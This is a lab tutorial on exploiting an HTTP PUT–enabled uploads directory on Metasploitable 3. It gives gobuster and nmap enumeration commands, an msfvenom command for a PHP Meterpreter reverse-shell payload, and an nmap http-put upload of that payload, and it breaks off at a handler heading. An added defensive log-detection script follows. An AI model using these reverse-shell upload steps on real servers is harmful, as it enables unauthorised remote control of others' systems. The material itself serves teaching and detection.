Web Exploit – HTTP-PUT

In this tutorial, we will exploit the HTTP PUT method to upload a malicious PHP file that creates a Meterpreter reverse shell.

The target system is Metasploitable 3, and the target service is the HTTP server on port 8585.

Directory Enumeration

First, let’s run a gobuster scan on port 8585 to find any directories that may be vulnerable.

gobuster -u -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-small.txt -t 40

HTTP Methods

Now that we have a list of directories, let’s start with the nmap script http-methods to see which HTTP methods this directory allows.

nmap -p 8585 -sV --script http-methods,http-trace --script-args http-methods.test-all=true,http-methods.url-path='/uploads/'

Payload build – MSFVenom

The “uploads” directory is vulnerable to HTTP PUT, so let’s build a PHP payload using MSFVenom.

msfvenom -p php/meterpreter_reverse_tcp lhost= lport=4444 -f raw > phpexploit.php


nmap --script http-put --script-args http-put.url='/uploads/shell.php',http-put.file='/root/phpexploit.php' -p 8585 -sV
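
On the defending side, the upload above leaves a recognisable trace in the web server's access log: an accepted PUT of a .php file under /uploads/, followed by a request for that same path. The following is an added example, not part of the original tutorial, that flags this sequence; the combined log format, the constructed sample lines and the name detect_put_uploads are assumptions.

```python
import re
from collections import namedtuple

# Constructed sample access-log lines (combined log format assumed); not from the original page.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Mar/2024:10:01:02 +0000] "OPTIONS /uploads/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
192.0.2.10 - - [12/Mar/2024:10:03:40 +0000] "PUT /uploads/shell.php HTTP/1.1" 201 0 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
198.51.100.7 - - [12/Mar/2024:10:04:00 +0000] "PUT /uploads/notes.txt HTTP/1.1" 201 0 "-" "curl/8.5.0"
192.0.2.10 - - [12/Mar/2024:10:05:11 +0000] "GET /uploads/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Mar/2024:10:06:00 +0000] "PUT /uploads/x.php HTTP/1.1" 405 312 "-" "curl/8.5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar", ".jsp", ".asp", ".aspx")
WRITE_OK = {"200", "201", "204"}  # statuses a server returns for an accepted PUT

Finding = namedtuple("Finding", "severity ip path detail")

def detect_put_uploads(log_text):
    """Flag accepted PUTs, especially of server-side scripts, and later requests for them."""
    uploaded = {}   # path -> uploader ip, for accepted script uploads
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, status = m["ip"], m["method"], m["status"]
        path = m["path"].split("?", 1)[0].lower()  # drop query string, normalise case
        if method == "PUT" and status in WRITE_OK:
            if path.endswith(SCRIPT_EXT):
                uploaded[path] = ip
                findings.append(Finding("high", ip, path, "script uploaded via PUT"))
            else:
                findings.append(Finding("medium", ip, path, "file uploaded via PUT"))
        elif method in ("GET", "POST") and status == "200" and path in uploaded:
            findings.append(Finding("critical", ip, path, "uploaded script requested"))
    return findings

if __name__ == "__main__":
    for f in detect_put_uploads(SAMPLE_LOG):
        print(f"{f.severity:8} {f.ip:15} {f.path:22} {f.detail}")
```

A rejected PUT (the 405 line) produces no finding, which is the result to expect once write methods are disabled on the uploads directory.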

Metasploit handler